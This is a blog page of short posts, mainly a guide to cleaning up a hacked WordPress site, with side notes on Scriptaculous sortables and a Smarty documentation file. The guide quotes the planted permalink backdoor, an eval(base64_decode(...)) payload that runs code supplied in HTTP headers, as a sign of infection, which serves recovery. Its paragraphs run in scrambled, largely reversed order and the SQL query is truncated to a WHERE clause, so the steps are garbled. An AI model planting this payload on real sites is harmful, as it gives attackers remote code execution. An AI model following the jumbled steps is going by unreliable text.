четверг, 7 февраля 2013 г.

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There is a of using nested Scriplaculous Sortables. With one little flaw – Scriplaculous ver 1.6.x is used, and when you try to execute the code with newer version of library – sections.each is not a function error pops up.

Try to find max. user_id in the list by hovering your mouse over links. Then copy the edit link of the user with topmost ID, insert it into address line, change it to next number and go. Did not work? Try the next number. Or previous one. You can even loop through all IDs not in use. And when you’ll find him – you know what to do!

Note the number of Admin users (right under “Users” header). One of them is you, all others – bastard ones

If you do not have ability to use some SQL tool – you can try to blind find bastards:

Just upgrade your wordpress. If you will do it periodically – there will be no such problems at all!

Replace First name with whatever you want (for example “z”), insert “motherfncker@test.com” into Email field (or whatever, but remember it, you’ll need it later) and set the Role into Subscriber. Push Update user. Then repeat with the next one in your user_ids list. After you finished – just type in into the search line word “motherfncker” (or whatever you set emails to). Now – just delete bastards!

Then paste it into address line, and change user_id=XX to the first user_id you wrote. Go.

http://yourblogurl.com/wp-admin/user-edit.php?user_id=14&wp_http_referer=%2Fwp-admin%2Fusers.php

You’ll see the list of records, write down user_ids of those guys.

WHERE `meta_value` LIKE '%script%'

Go to your preferred mysql administration tool (say, MySqlAdmin) and run this code in the SQL window:

Set your permalink structure to whatever it was earlier. If you don’t even imagine what it was – you can always ask google for it – just like this: site:yourblogurl.com – and you’ll see the answer in the links to your site.

Do not panic – you’re hacked. And there is three steps to get rid of it.

error on line 22 at column 71: xmlParseEntityRef: no name wordpress

Or your feed crapped like this:

/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

blah/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Weird things happens. Mostly in WordPress. One morning you see that your permalinks became a something like this:

I’ve compiled current online Smarty 3 documentation into one CHM file. Take it, use it, enjoy.

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